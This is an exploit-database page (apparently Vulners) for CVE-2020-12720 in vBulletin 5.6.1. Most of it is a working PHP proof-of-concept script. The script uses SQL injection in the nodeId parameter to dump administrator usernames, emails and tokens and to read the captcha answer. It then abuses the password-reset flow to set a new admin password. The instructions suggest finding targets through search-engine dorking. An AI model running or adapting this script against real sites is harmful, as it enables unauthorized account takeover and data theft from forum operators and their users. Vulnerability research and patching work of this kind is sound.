Vulners
Lucene search
vBulletin 5.6.1 SQL Injection
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | vBulletin 5.6.1 CVE-2020-12720 - SQL Injection | 3 Jun 202015:53 | – | 0daydb |
| QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution | 3 Jun 202015:51 | – | 0daydb |
| vCloud Director 9.7.0.15498291 CVE-2020-3956 - Remote Code Execution | 3 Jun 202015:54 | – | 0daydb |
 | vBulletin 5.6.1 - (nodeId) SQL Injection Vulnerability | 15 May 202000:00 | – | zdt |
| vBulletin 5.6.1 SQL Injection Exploit | 2 Jun 202000:00 | – | zdt |
 | CVE-2020-12720 vBulletin incorrect access control | 8 May 202000:00 | – | attackerkb |
 | CVE-2020-12720 | 11 May 202021:20 | – | circl |
 | vBulletin nodeId SQL Injection (CVE-2020-12720) | 18 May 202000:00 | – | checkpoint_advisories |
 | CVE-2020-12720 | 7 May 202023:52 | – | cve |
 | CVE-2020-12720 | 7 May 202023:52 | – | cvelist |
10
=============================================================================================================================================
| # Title : vbulletin 5.6.1 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://vbulletin.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] vulnerability found in vBulletin 5.x.x to dump the user table information or to dump all of the vBulletin tables (based on the selected options)
[+] save code as poc.php .
[+] Line 5 : set your target.
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
$sADMINPASS = '12345678';
$sCMD = 'id';
$sURL = 'https://[target]/forums/';
$sUSERID = '1';
$sNEWPASS = '87654321';
$iTimeout = 5;
// Function to send a POST request
function getData($sUrl, $lData) {
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($lData),
'timeout' => 5,
],
];
$context = stream_context_create($options);
$result = @file_get_contents($sUrl, false, $context);
if ($result === FALSE) {
die('----- ERROR, site down?');
}
return $result;
}
// Function to generate random strings
function randomString($length = 8) {
return substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz', ceil($length / 26))), 1, $length);
}
// Function to verify the vulnerability
function verifyBug($sURL, $sUserid = '1') {
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'];
$sResponse = getData($sURL . $sPath, $lData);
if (strpos($sResponse, 'cve-2020-12720') === false) {
echo '[!] Warning: not vulnerable' . PHP_EOL;
return false;
} else {
echo '[+] SQLi Success!' . PHP_EOL;
return true;
}
}
// Function to takeover account
function takeoverAccount($sURL, $sNEWPASS) {
$sPath = 'ajax/api/content_infraction/getIndexableContent';
// Get Table Prefixes
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 FROM information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sPrefix = isset($matches[1]) ? str_replace(['"', '}', 'language'], '', $matches[1]) : '';
// Get usergroup ID for "Administrators"
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'usergroup WHERE title=\'Administrators\';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sGroupID = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';
// Get admin data
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'user WHERE usergroupid=' . $sGroupID . ';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
list($sUsername, $sUserid, $sUsermail, $sUserTokenOrg) = explode('|', isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '');
// Create Human Verify Captcha
$sPath = 'ajax/api/hv/generateToken?';
$lData = ['securitytoken' => 'guest'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/hash.*?:(.*?)}"/', $sResponse, $matches);
$sHash = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';
// Get the captcha answer from DB
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'humanverify LIMIT 0,1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$iAnswers = isset($matches[1]) ? (int) str_replace(['"', '}'], '', $matches[1]) : 1;
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'humanverify LIMIT ' . ($iAnswers - 1) . ',1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sAnswer = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';
// Request password reset
$sPath = 'auth/lostpw';
$lData = [
'email' => $sUsermail,
'humanverify[input]' => $sAnswer,
'humanverify[hash]' => $sHash,
'securitytoken' => 'guest'
];
$sResponse = getData($sURL . $sPath, $lData);
// Get activation token
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'useractivation WHERE userid=' . $sUserid . ' LIMIT 0,1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sToken = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';
// Reset password
$sPath = 'auth/reset-password';
$lData = [
'userid' => $sUserid,
'activationid' => $sToken,
'new-password' => $sNEWPASS,
'new-password-confirm' => $sNEWPASS,
'securitytoken' => 'guest'
];
$sResponse = getData($sURL . $sPath, $lData);
if (strpos($sResponse, 'Logging in') === false) {
echo '[!] Failed to take over the account!' . PHP_EOL;
} else {
echo '[+] Account takeover success!' . PHP_EOL;
}
}
// Main execution
if (verifyBug($sURL)) {
takeoverAccount($sURL, $sNEWPASS);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2025 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.5
CVSS 3.19.8
EPSS0.9382